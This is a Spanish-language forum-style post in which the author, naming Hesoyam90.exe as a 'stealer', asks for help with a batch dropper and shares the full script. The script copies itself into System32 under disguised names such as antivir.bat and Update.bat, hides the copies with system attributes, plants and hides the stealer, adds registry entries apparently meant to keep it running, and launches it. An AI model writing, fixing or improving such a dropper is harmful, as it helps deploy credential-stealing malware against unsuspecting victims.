2.Como se kita la confirmacion de reepmplazo de win32.dll
Hesoyam90.exe es el stealer
Quiero que al ejecutar un bath este se autocopie un par de veces por si alguno falla
se ponga oculto y copie y ejecute el stealer
Código: Seleccionar todo
::------Copiar , ocultar y añadir------::
@echo off
Copy /y %0, "%windir%\System32\WinXpBoot.bat"
attrib +H +S "%windir%\System32\WinXpBoot.bat"
Copy /y %0, "%windir%\System32\DllRegistrer.bat"
attrib +H +S "%windir%\System32\DllRegistrer.bat"
Copy /y %0, "%windir%\System32\antivir.bat"
attrib +H +S "%windir%\System32\antivir.bat"
Copy /y %0, "%windir%\System32\Update.bat"
attrib +H +S "%windir%\System32\Update.bat"
Copy /y %0, "%windir%\System32\SystemCriticalFile.bat"
attrib +H +S "%windir%\System32\SystemCriticalFile.bat"
copy "Hesoyam90.exe" "%windir%\System32\Hesoyam90.exe"
copy "Hesoyam90.exe" "%windir%\System32\"
copy "Hesoyam90.exe" "%windir%\System32"
attrib +H +S "%windir%\System32\Hesoyam90.exe"
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion" /v Win32.dll /d "%windir%\System32\Hesoyam90.exe"
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion" /v Win32.dll /d "%windir%\System32\WinXpBoot.bat"
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion" /v Win32.dll /d "%windir%\System32\DllRegistrer.bat"
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion" /v Win32.dll /d "%windir%\System32\antivir.bat"
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion" /v Win32.dll /d "%windir%\System32\Update.bat"
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion" /v Win32.dll /d "%windir%\System32\SystemCriticalFile.bat"
::------Ejecutar Hesoyam------::
@echo off
"%windir%\System32\Hesoyam90.exe"
